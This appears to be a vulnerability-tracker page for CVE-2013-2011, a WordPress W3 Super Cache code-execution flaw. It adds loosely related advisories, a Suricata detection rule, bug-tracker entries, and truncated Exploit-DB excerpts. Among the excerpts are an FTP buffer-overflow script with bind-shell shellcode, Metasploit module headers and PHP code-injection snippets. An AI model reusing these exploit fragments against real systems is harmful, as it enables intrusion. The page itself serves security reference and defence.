CVE-2013-2011
published 2019-12-26CVE-2013-2011: WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execution vulnerability which could allow remote attackers to inject arbitrary code. This…
PriorityP348high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EPSS
5.13%
91.3th percentile
WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execution vulnerability which could allow remote attackers to inject arbitrary code. This issue exists because of an incomplete fix for CVE-2013-2009.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | httpd | — | — |
| automattic | w3_super_cache | < 1.3.2 | 1.3.2 |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_apache7.8HIGH
vendor_redhat1.9LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v2r5-9cm2-xw4x: WordPress W3 Super Cache Plugin before 1
ghsa_unreviewed·2022-05-05·CVSS 8.8
CVE-2013-2011 [HIGH] GHSA-v2r5-9cm2-xw4x: WordPress W3 Super Cache Plugin before 1
WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execution vulnerability which could allow remote attackers to inject arbitrary code. This issue exists because of an incomplete fix for CVE-2013-2009.
Red Hat
tomcat: World-readable log directory
vendor_redhat·2013-02-22·CVSS 1.9
CVE-2013-0346 [LOW] tomcat: World-readable log directory
tomcat: World-readable log directory
Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."
Statement: Red Hat does not regard this to be a security flaw. The tomcat log directory does not contain any sensitive information, and when sensitive information has been written to log files, this has been considered a security flaw in tomcat (e.g. CVE-2011-2204). This issue was reported to the Apache Tomcat project, and they have not considered it a flaw in any published security advisories.
VMware
VMware vSphere security updates for the authentication service and third party libraries
vendor_vmware·2013-01-31·CVSS 10.0
CVE-2011-1202 [CRITICAL] VMware vSphere security updates for the authentication service and third party libraries
VMSA-2013-0001: VMware vSphere security updates for the authentication service and third party libraries
a. VMware vSphere client-side authentication memory corruption vulnerability VMware vCenter Server, vSphere Client, and ESX contain a vulnerability in the handling of the management authentication protocol. To exploit this vulnerability, an attacker must convince either vCenter Server, vSphere Client or ESX to interact with a malicious server as a client. Exploitation of the issue may lead to code execution on the client system. To reduce the likelihood of exploitation, vSphere components should be deployed on an isolated management network. The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2013-1405 to this issue. Column 4 of the following tabl
Apache
Apache httpd: CVE-2011-3192
vendor_apache·CVSS 7.8
CVE-2011-3192 [HIGH] Apache httpd: CVE-2011-3192
Apache httpd: CVE-2011-3192
A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. This could be used in a denial of service attack. Advisory: CVE-2011-3192.txt Reported to security team 2011-08-20 Issue public 2011-08-20 Update 2.2.20 released 2011-08-30 Update 2.0.65 released 2013-07-12 Affects 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0, 2.0.64, 2.0.63, 2.0.61, 2.0.59, 2.0.58, 2.0.55, 2.0.54, 2.0.53, 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Exploit-DB
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
exploitdb·2014-06-18
CVE-2014-4334 Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset()
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
Exploit-DB
UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information
exploitdb·2013-12-16
CVE-2013-7136 UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information
UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information
---
# Exploit Title: UPC Ireland Cisco EPC 2425 Router / Horizon Box
# Google Dork:
# Date: 11/12/2013
# Author: Matt O'Connor / Planit Computing
# Advisory Link: http://www.planitcomputing.ie/upc-wifi-attack.pdf
# Version:
# Category: Remote
# Tested on: Cisco EPC 2425 / Horizon Box
The Cisco EPC 2425 routers supplied by UPC are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
Random
A to Z Uppercase only
8 characters long
208,827,064,576 possible combinations ( AAAAAAAA ZZZZZZZZ ) 26^8
We notified UPC about the problem in November 2011 yet UPC are still supplying customers with newer modems / hor
Exploit-DB
Zimbra 2009-2013 - Local File Inclusion
exploitdb·2013-12-06
CVE-2013-7091 Zimbra 2009-2013 - Local File Inclusion
Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allo
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
CVE-2011-4275 ZonPHP 2.25 - Remote Code Execution
ZonPHP 2.25 - Remote Code Execution
---
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",�
"Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);�
$shell
Exploit-DB
ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
exploitdb·2013-05-14
CVE-2013-0726 ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "ERS Viewer 2011 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
CVE-2011-4275 Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
---
# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
Exploit-DB
FreeBSD 9.1 - 'ftpd' Remote Denial of Service
exploitdb·2013-02-05·CVSS 4.0
CVE-2011-0418 [MEDIUM] FreeBSD 9.1 - 'ftpd' Remote Denial of Service
FreeBSD 9.1 - 'ftpd' Remote Denial of Service
---
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.
Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include
#include
int main(){
glob_t globbuf;
char stringa[]="{
Exploit-DB
Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities
exploitdb·2013-01-18
CVE-2013-2679 Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities
Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities
---
Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco
============ Vulnerable Firmware Releases: ============
Firmware Version: 4.30.15 build 2, 01/20/2011
============ Device Description: ============
The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.
Source: http://homesupport.
Exploit-DB
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)
exploitdb·2011-11-08
CVE-2011-2013 Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)
---
// source: https://www.securityfocus.com/bid/50517/info
Microsoft Windows is prone to a remote integer-overflow vulnerability that affects the TCP/IP stack.
An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts may result in a denial-of-service condition.
#!/bin/sh
cat >> winnuke2011.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);
int main(int argc, char *argv[]) {
pthread_t thread;
int iret,lthreads;
pid_t pid;
printf("[+] MS11-083 DoS/PoC
Exploit-DB
7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
exploitdb·2011-05-30
CVE-2013-0657 7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit)
---
##
# $Id: igss9_misc.rb 12779 2011-05-31 14:33:19Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",
'Description' => %q{
This module exploits multiple vulnerabilities found on IGSS 9's Data Server and
Data Collector services. The initial approach is first by transferring our binary
with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send
an EXE packe
Exploit-DB
WordPress Plugin User Photo Component - Arbitrary File Upload
exploitdb·2011-02-17
CVE-2013-1916 WordPress Plugin User Photo Component - Arbitrary File Upload
WordPress Plugin User Photo Component - Arbitrary File Upload
---
# Exploit Title: WordPress User Photo Component Remote File Upload Vulnerability
# Google Dork: inurl:"/wp-content/uploads/userphoto/"
# Date: 17/FEB/2011
# Author: ADVtools
# Software Link: http://wordpress.org/extend/plugins/user-photo/
# Version: 0.9.4
# Tested on: *nix , Windows
I. Product Description
User Photo is a WordPress component that allows a user to associate a photo with her account and for this photo to be displayed in posts and comments.
II. Vulnerability description
When a photo is uploaded, it is only partially validated and it is possible to upload a backdoor on the server hosting WordPress. This backdoor can be called (executed) even if the photo has not been yet approved.
III. Analysis
1. Image
HackerOne
SSL/TLS Vulnerability at khanacademy.org
hackerone·2017-02-22·CVSS 7.5
[HIGH] SSL/TLS Vulnerability at khanacademy.org
SSL/TLS Vulnerability at khanacademy.org
CVE - 2011 - 3389
Description :
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
Problem Location :
https://www.khanacademy.org/
Mitigation :
The Upgrade TLS version on the server to latest stable version
CVE - 2013 - 0169 :
Description :
The TLS protocol 1.1
Bugzilla
CVE-2013-4550 CVE-2011-5268 bip: failed SSL handshake resource leak
bugzilla·2013-11-08·CVSS 4.3
CVE-2013-4550 [MEDIUM] CVE-2013-4550 CVE-2011-5268 bip: failed SSL handshake resource leak
CVE-2013-4550 CVE-2011-5268 bip: failed SSL handshake resource leak
Marc Deslauriers reports:
Hello,
bip 0.8.8 and earlier contains an issue where failed SSL handshakes result in a
resource leak. A remote attacker can use this flaw to cause bip to run out of
resources, resulting in a denial of service.
Upstream bug:
https://projects.duckcorp.org/issues/261
Fixed by the following commit in 0.8.9:
https://projects.duckcorp.org/projects/bip/repository/revisions/df45c4c2d6f892e3e1dec23ce0ed2575b53a7d8c
Downstream bug:
https://bugs.launchpad.net/ubuntu/precise/+source/bip/+bug/1247888
Discussion:
Created bip tracking bugs for this issue:
Affects: fedora-all [bug 1028608]
Affects: epel-6 [bug 1028609]
---
Created bip tracking bugs for this issue:
Affects: epel-5 [bug 1028610]
---
b
Bugzilla
CVE-2011-5267 xinha: multiple cross-site scripting vulnerabilities
bugzilla·2013-11-05·CVSS 4.3
CVE-2011-5267 [MEDIUM] CVE-2011-5267 xinha: multiple cross-site scripting vulnerabilities
CVE-2011-5267 xinha: multiple cross-site scripting vulnerabilities
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-5267 to
the following vulnerability:
Name: CVE-2011-5267
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5267
Assigned: 20131105
Reference: EXPLOIT-DB:16988
Reference: http://www.exploit-db.com/exploits/16988
Reference: http://www.openwall.com/lists/oss-security/2013/09/01/1
Reference: http://www.openwall.com/lists/oss-security/2013/09/01/3
Reference: http://www.autosectools.com/Advisories/WikiWig.5.01_Persistent-Reflected.Cross-site.Scripting_139.html
Reference: OSVDB:71070
Reference: http://www.osvdb.org/71070
Multiple cross-site scripting (XSS) vulnerabilities in
spell-check-savedicts.php in the SpellChecker module in Xinha, as used
in Wi
Bugzilla
CVE-2011-4969 jquery: Cross-site scripting (XSS) via $(location.hash) and $(#<tag>)
bugzilla·2013-02-01·CVSS 4.3
CVE-2011-4969 [MEDIUM] CVE-2011-4969 jquery: Cross-site scripting (XSS) via $(location.hash) and $(#<tag>)
CVE-2011-4969 jquery: Cross-site scripting (XSS) via $(location.hash) and $(#)
A cross-site scripting (XSS) flaw was found in the way jQuery, a fast, small, and feature-rich JavaScript library, performed sanitization of location.hash and arguments in certain circumstances. A remote attacker could provide a specially-crafted web page to a web-based application using the jQuery library that, when processed would lead to arbitrary HTML or web script execution in the context of logged-in user session.
Upstream bug report:
[1] http://bugs.jquery.com/ticket/9521
References:
[2] http://blog.jquery.com/2011/09/01/jquery-1-6-3-released/
[3] http://www.openwall.com/lists/oss-security/2013/01/31/3
Discussion:
Created drupal7-jquery_update tracking bugs for this issue
Affects: fedora-all [bug 89
Bugzilla
CVE-2013-0200 hplip: insecure temporary file handling flaws
bugzilla·2013-01-21·CVSS 1.2
CVE-2013-0200 [LOW] CVE-2013-0200 hplip: insecure temporary file handling flaws
CVE-2013-0200 hplip: insecure temporary file handling flaws
Temporary file handling flaws were found in several places in hplip. Because a predicatable temporary filenames are used, an attacker could use a symlink attack to overwrite an arbitrary file with the privileges of the process running hplip.
This is a different flaw than CVE-2011-2722.
Discussion:
Acknowledgements:
This issue was discovered by Tim Waugh of Red Hat.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Via RHSA-2013:0500 https://rhn.redhat.com/errata/RHSA-2013-0500.html
---
Statement:
This issue does not affect the version of hplip and hplip3 as shipped with Red Hat Enterprise Linux 5. This issue has been addressed in Red Hat Enterprise Linux 6 via RHSA-2013:0500.
Bugzilla
CVE-2011-4966 freeradius: does not respect expired passwords when using the unix module
bugzilla·2012-11-21·CVSS 6.0
CVE-2011-4966 [MEDIUM] CVE-2011-4966 freeradius: does not respect expired passwords when using the unix module
CVE-2011-4966 freeradius: does not respect expired passwords when using the unix module
When FreeRADIUS is configured to use the 'unix' module and shadow passwords, the password expiration field is ignored. This could allow a user with an expired password to authenticate against FreeRADIUS.
This was corrected upstream:
https://github.com/alandekok/freeradius-server/commit/1b1ec5ce75e224bd1755650c18ccdaa6dc53e605
And was also corrected in Red Hat Enterprise Linux 6 via RHBA-2012:0881:
https://rhn.redhat.com/errata/RHBA-2012-0881.html
Statement:
(none)
Discussion:
This issue affects the version of freeradius and freeradius2 as shipped with Red Hat Enterprise Linux 5.
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Via RHSA-2013:0134 https://rh
Bugzilla
CVE-2011-5036 CVE-2013-0184 rubygem-rack various flaws [epel-all]
bugzilla·2012-01-02·CVSS 5.0
CVE-2011-5036 [MEDIUM] CVE-2011-5036 CVE-2013-0184 rubygem-rack various flaws [epel-all]
CVE-2011-5036 CVE-2013-0184 rubygem-rack various flaws [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include this bug ID and the
bug IDs of this bug's parent bugs filed against the "Security Response"
product (the top-level CVE bugs). Please mention the CVE IDs being fixed
in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=7711
Bugzilla
CVE-2011-4575 JMX Console: XSS in invoke operation
bugzilla·2011-12-06·CVSS 4.3
CVE-2011-4575 [MEDIUM] CVE-2011-4575 JMX Console: XSS in invoke operation
CVE-2011-4575 JMX Console: XSS in invoke operation
The parameters passed to operation invocations on the JMX console are not properly sanitized. Remote attackers can use this flaw to inject arbitrary web script or HTML into the JMX console.
Discussion:
Acknowledgment:
Red Hat would like to thank Tyler Krpata for reporting this issue.
---
This issue has been addressed in following products:
JBoss Enterprise Application Platform 5.2.0
Via RHSA-2013:0194 https://rhn.redhat.com/errata/RHSA-2013-0194.html
---
This issue has been addressed in following products:
JBEAP 5 for RHEL 5
Via RHSA-2013:0192 https://rhn.redhat.com/errata/RHSA-2013-0192.html
---
This issue has been addressed in following products:
JBEAP 5 for RHEL 6
Via RHSA-2013:0191 https://rhn.redhat.com/errata/RHSA-201
http://www.openwall.com/lists/oss-security/2013/04/25/4http://www.securityfocus.com/bid/59473https://exchange.xforce.ibmcloud.com/vulnerabilities/83800https://security-tracker.debian.org/tracker/CVE-2013-2011http://www.openwall.com/lists/oss-security/2013/04/25/4http://www.securityfocus.com/bid/59473https://exchange.xforce.ibmcloud.com/vulnerabilities/83800https://security-tracker.debian.org/tracker/CVE-2013-2011
2019-12-26
Published